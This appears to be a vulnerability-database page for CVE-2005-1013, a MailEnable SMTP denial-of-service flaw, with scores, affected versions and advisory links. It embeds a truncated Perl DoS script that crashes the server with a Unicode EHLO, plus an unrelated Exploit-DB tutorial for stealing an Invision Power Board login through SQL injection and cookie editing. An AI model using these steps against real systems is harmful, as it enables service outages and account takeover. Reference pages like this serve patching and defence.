CVE-2005-1013
published 2005-05-02CVE-2005-1013: The SMTP service in MailEnable Enterprise 1.04 and earlier and Professional 1.54 and earlier allows remote attackers to cause a denial of service (server…
PriorityP423medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
5.72%
92.1th percentile
The SMTP service in MailEnable Enterprise 1.04 and earlier and Professional 1.54 and earlier allows remote attackers to cause a denial of service (server crash) via an EHLO command with a Unicode string.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_enterprise | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
| mailenable | mailenable_professional | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)
exploitdb·2005-05-27
CVE-2005-1598 Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)
Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)
---
# danica jones
Tutorial for the recent exploit released by Petey Beege.
1. Get the exploit from http://www.milw0rm.com/id.php?id=1013 (https://www.exploit-db.com/exploits/1013/)
2. Make sure you have LWP::UserAgent perl module if not do this:
a. perl -MCPAN -e 'shell'
b. inside the perl shell, do this 'install LWP::UserAgent'
3. Run the exploit. Get the password hash for the desired login id
ex. inv.pl http://forums.example.com 2 2
Where 2 is the login id and 2 for version 2 of IPB.
4. Open wordpad. Edit Mozilla Firefox's cookie file. Mine is located at
C:\Documents and Settings\the1\Application Data\Mozilla\Firefox\Profiles\vspyhjb9.default\cookies.txt"
Add the following entries:
forums.example.com FALSE / FAL
Exploit-DB
MailEnable Enterprise 1.x - SMTP Remote Denial of Service
exploitdb·2005-04-05
CVE-2005-1013 MailEnable Enterprise 1.x - SMTP Remote Denial of Service
MailEnable Enterprise 1.x - SMTP Remote Denial of Service
---
#!/usr/bin/perl
##################################################################################
#MailEnable (Enterprise "$host",
PeerPort => 25,
Proto => 'tcp');
die unless $socket;
print "[+]Sending Unicode String\n";
print $socket "EHLO $bof\r\n";
print "[+]Server is Killed!\n";
close;
sub Usage {
print STDERR "Usage:
-h Victim host.\n\n";
exit;
}
# milw0rm.com [2005-04-05]
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=111273637518494&w=2http://secunia.com/advisories/14812http://securitytracker.com/id?1013637http://www.mailenable.com/hotfix/http://www.osvdb.org/15232http://www.securiteam.com/windowsntfocus/5HP031PFFG.htmlhttp://www.securityfocus.com/bid/12994https://exchange.xforce.ibmcloud.com/vulnerabilities/19948https://exchange.xforce.ibmcloud.com/vulnerabilities/19973http://marc.info/?l=bugtraq&m=111273637518494&w=2http://secunia.com/advisories/14812http://securitytracker.com/id?1013637http://www.mailenable.com/hotfix/http://www.osvdb.org/15232http://www.securiteam.com/windowsntfocus/5HP031PFFG.htmlhttp://www.securityfocus.com/bid/12994https://exchange.xforce.ibmcloud.com/vulnerabilities/19948https://exchange.xforce.ibmcloud.com/vulnerabilities/19973
2005-05-02
Published